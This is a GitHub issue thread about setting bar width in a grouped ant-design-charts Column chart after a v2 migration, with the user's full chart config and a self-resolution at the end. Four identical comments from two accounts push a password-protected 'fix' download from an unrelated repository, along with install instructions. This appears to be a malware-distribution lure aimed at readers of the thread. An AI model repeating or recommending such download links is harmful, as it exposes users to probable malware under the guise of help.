### ISSUE TITLE
🧐[问题] How to change the width of the bars of a grouped Column Chart ?

### ISSUE THREAD

**Issue by RosaErick** [ant-design/ant-design-charts#2673]
Hi, im migrating from 1.4 to v2 and having a hardtime on how to fix the width of one my column charts. Using       style:{
        maxWidth: 20,
      }, simple dont work on this plot and i dont understand why.  

plot: { Column } from "@ant-design/plots";

config:
{
      data: processedData,
     
      xField: "grupo",
      yField: "preco",
      seriesField: "tipoPreco",
      style:{
        maxWidth: 20,
      }, 
      scale: { color: { range: COLORS } },
      colorField: "tipoPreco",
      autoFit: true,
      legend: {
        position: "top-left",
        layout: "horizontal",
        slidable: true,
        maxRow: 3,
      },
      label: {
        position: "inside",
        layout: "vertical",
        formatter: (v) => "R$ " + v?.toFixed(2),
        style: {
          fontSize: 12,
          fontWeight: "bold",
          textAlign: "center",
          fill: "#000",
      
        },
      },
      interaction: {
        tooltip: {
          render: (e, { title, items }) => {
            if (!items || !items.length) return null;

            console.log("items", items)
            console.log("title", title)
            console.log("data", data)

            return (
              <div key={title}>
                <h4>{title}</h4>
                <div style={{ fontSize: 'small' }}>{data[0].descricao} - Últimos 7 dias</div>
                <div style={{ fontSize: 'small' }}>{data[0].cidade}</div>
                {items.map((item) => {

                  console.log("item", item)
                  console.log("data", data)
                  const { name, value, color, } = item;

                  console.log("processedData", processedData)

                  return (
                    <div key={name} style={{ marginBottom: 4 }}>
                      <div style={{ margin: 0, display: 'flex', justifyContent: 'space-between' }}>
                        <div>
                          <span
                            style={{
                              display: 'inline-block',
                              width: 6,
                              height: 6,
                              borderRadius: '50%',
                              backgroundColor: color,
                              marginRight: 6,
                            }}
                          ></span>
                          <span>{name}</span>
                        </div>
                        <b>R$ {value.toFixed(2)}</b>
                      </div>

                    </div>
                  );
                })}

              </div>
            );
          },
        },
      },
      marginRatio: 0.3,

      xAxis: {
        tickLine: null,
      },
      yAxis: {
        label: {
          formatter: (value) => `R$ ${value}`,
        },
      },
      height: 400, 
    };
  }

**Comment by Jostino** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Amrithesh-k** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Jostino** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Amrithesh-k** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by lxfu1** [comment]
I tried it. Is it available?  

![image](https://github.com/user-attachments/assets/d5346d8e-ee9b-4f36-b5d7-87ab10e615d3)

**Comment by RosaErick** [comment]
sorry we can close this issue, i found the problem, that was already a style key, not in the config object but passed as props direct to the plot, sorry for the inconvenience
